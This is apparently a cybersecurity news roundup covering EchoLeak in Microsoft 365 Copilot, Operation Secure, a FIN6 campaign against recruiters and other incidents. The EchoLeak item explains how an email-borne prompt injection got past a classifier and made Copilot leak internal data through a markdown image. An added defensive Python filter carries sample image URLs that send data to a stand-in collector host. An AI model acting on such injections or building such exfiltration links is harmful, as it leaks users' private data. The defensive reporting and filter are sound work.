Cybersecurity News: Copilot zero-click, Operation Secure, FIN6 targets recruiters

In today’s cybersecurity news…

Zero-click data leak flaw in Copilot

Researchers at Aim Labs documented a flaw in Microsoft 365 Copilot dubbed EchoLeak, part of an emerging class of “LLM Scope Violation” vulnerabilities. By hiding a prompt injection in an otherwise banal business email, the researchers could get around Microsoft’s cross-prompt injection attack classifier protections. When a user later asks about the email, the Retrieval-Augmented Generation (RAG) engine pulls in the malicious injection, which causes internal data to be inserted into a crafted markdown image and sent to a third-party server. Aim Labs reported the issue to Microsoft back in January, and Microsoft subsequently issued a server-side fix in May.

(Fortune, Bleeping Computer)
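
An added example, not code from Aim Labs or Microsoft: a defensive output filter for the channel described above, which removes markdown images in a model response unless they point to an allowlisted host. It goes beyond the item's text by handling both inline and reference-style image syntax; the allowlisted host, the collector host and the sample response are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host the chat client may fetch images from (hypothetical).
ALLOWED_IMAGE_HOSTS = {"assets.example-tenant.test"}

INLINE_IMG = re.compile(r'!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)')
REF_IMG = re.compile(r'!\[([^\]]*)\]\[([^\]]*)\]')
REF_DEF = re.compile(r'^[ \t]{0,3}\[([^\]]+)\]:[ \t]*<?(\S+?)>?(?:[ \t].*)?$', re.M)

def host_allowed(url):
    """True only for https URLs whose host is on the allowlist."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    return parts.scheme == "https" and (parts.hostname or "").lower() in ALLOWED_IMAGE_HOSTS

def sanitize_markdown_images(text):
    """Return (clean_text, blocked_urls) for one model response."""
    blocked = []
    defs = {m.group(1).strip().lower(): m.group(2) for m in REF_DEF.finditer(text)}

    def inline(m):
        if host_allowed(m.group(2)):
            return m.group(0)
        blocked.append(m.group(2))
        return f"[image removed: {m.group(1)}]"

    def ref(m):
        url = defs.get((m.group(2) or m.group(1)).strip().lower())
        if url is None or host_allowed(url):
            return m.group(0)
        blocked.append(url)
        return f"[image removed: {m.group(1)}]"

    text = REF_IMG.sub(ref, INLINE_IMG.sub(inline, text))
    # Dropping disallowed definitions also disarms shortcut images (![label]).
    text = REF_DEF.sub(lambda m: m.group(0) if host_allowed(m.group(2)) else "", text)
    return text, blocked

# Constructed model output: one legitimate image, two that would leak data in the URL.
SAMPLE = ("Here is the summary you asked for.\n"
          "![logo](https://assets.example-tenant.test/logo.png)\n"
          "![status](https://collector.example.invalid/p.png?d=Q3_forecast_draft)\n"
          "![chart][c1]\n\n"
          "[c1]: https://collector.example.invalid/c.png?d=internal_notes\n")

if __name__ == "__main__":
    print(*sanitize_markdown_images(SAMPLE), sep="\n")
```

The blocked URL list is worth logging: an image URL to an unknown host with data in its query string is a useful detection signal even when the filter has already stopped the request.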

Operation Secure targets infostealer operations

Interpol announced the results of Operation Secure, an international law enforcement effort that targeted infostealer infrastructure across 26 countries. The operation ran from January through April 2025, resulting in the takedown of over 20,000 malicious IP addresses, the seizure of 2,300 domains associated with malware-as-a-service operations, the arrest of 32 suspects, and the notification of 216,000 total victims. Lumma, RisePro, and the META Stealer all had their infrastructure impacted by the operation. Private cybersecurity partners, including Kaspersky, Group-IB, and Trend Micro, also aided in the operation.

(The Record, Bleeping Computer)

FIN6 targets recruiters

A new report from DomainTools found that the long-running FIN6 cybercrime group has been operating a campaign posing as job applicants on LinkedIn and Indeed to target recruiters. The campaign sees them slowly initiating conversations on various job-posting platforms to gain trust. This is followed by a phishing email without clickable links, prompting the victim to manually enter a URL that leads to a fake resume site hosted on a legitimate cloud provider. These pages verify the victim before delivering a zip file that installs the MoreEggs backdoor. From there, the threat actors steal credentials and deploy ransomware.

(The Record)

United Natural Foods recovery plan

Earlier this week we shared the report that United Natural Foods shut down all business systems from ordering to selection and shipping due to a cyberattack. On its earnings call, CEO Sandy Douglas said the company now expects to bring systems back online by June 15th, ten days after the attack was discovered on June 5, 2025. Bloomberg’s sources say the disruption isn’t anticipated to impact the company’s payroll processing, but that some worker shifts have been cancelled due to shuttered operations, even as managers cannot call staff to tell them not to come in. Anecdotal evidence shows some Whole Foods stores impacted by this outage, with significantly empty shelves for some items.

(Bloomberg)

WhatsApp to back Apple in dispute with UK Home Office

Back in March, Apple filed an appeal to the UK’s Investigatory Powers Tribunal, after receiving a secret order from the Home Office to pass on encrypted data from users in the event of a national security threat. You may recall Apple decided to remove its Advanced Data Protection feature in the UK over this dispute. There’s not a lot of love lost between Apple and Meta, which makes it notable that WhatsApp head Will Cathcart said the company applied to submit evidence to the court in support of Apple’s appeal. Cathcart noted the messaging giant “would challenge any law or government request that seeks to weaken the encryption of our services.”

(BBC)

Bill seeks to strengthen healthcare security

Congressman Jason Crow introduced the bipartisan Healthcare Cybersecurity Bill to Congress. If passed, the bill would require CISA and the US Department of Health and Human Services to work together on measures to improve cybersecurity across the sector, including sharing of threat intelligence, CISA-provided training to healthcare orgs, the creation of a healthcare risk management plan with best practices, and creating an objective basis for determining high-risk assets. This follows plans to update HIPAA Security Rules announced back in January, which require additional security measures for protected health information.

(Infosecurity Magazine)

AI-slop spam campaign hits abandoned sites

404 Media reports that domains owned by prominent companies and organizations, including Nvidia, Stanford, NPR, and the U.S. Department of Health and Human Services’ vaccines.gov, were seemingly infiltrated by a spam marketing campaign. These sites hosted thousands of AI-generated articles each, ranging from travel guides to video game reviews, and the absurdly lewd. Most of these domains were no longer active, like NPR’s “Generation Listen” project from 2014. All sites carried a byline of “Ashley” on articles, with the same Disclaimer, DMCA, Privacy Policy and Terms of Use pages. Clicking through any links on the sites goes to an SEO spam page. Based on site archives, some domains were hijacked for over a month. 

(404 Media)

DanaBot leaked data for 3 years

Last month, we covered that an international law enforcement effort disrupted the DanaBot botnet, a malware-as-a-service platform operating since 2018. Following the takedown, security researchers at Zscaler discovered that a flaw in DanaBot’s C2 servers caused a memory leak from June 2022 to early 2025. Dubbed DanaBleed, the flaw leaked up to 1,792 arbitrary bytes per server response. Researchers obtained victim data, usernames, IP addresses, malware version updates, and private cryptographic keys. It remains unclear if this disruption effort and leaked data will lead to a permanent takedown of the operation. 

(Security Week)

Rich Stroffolino
Rich Stroffolino is a podcaster, editor, and writer based out of Cleveland, Ohio. Since 2015, he's worked in technology news podcasting and media. He dreams of someday writing the oral history of Transmeta.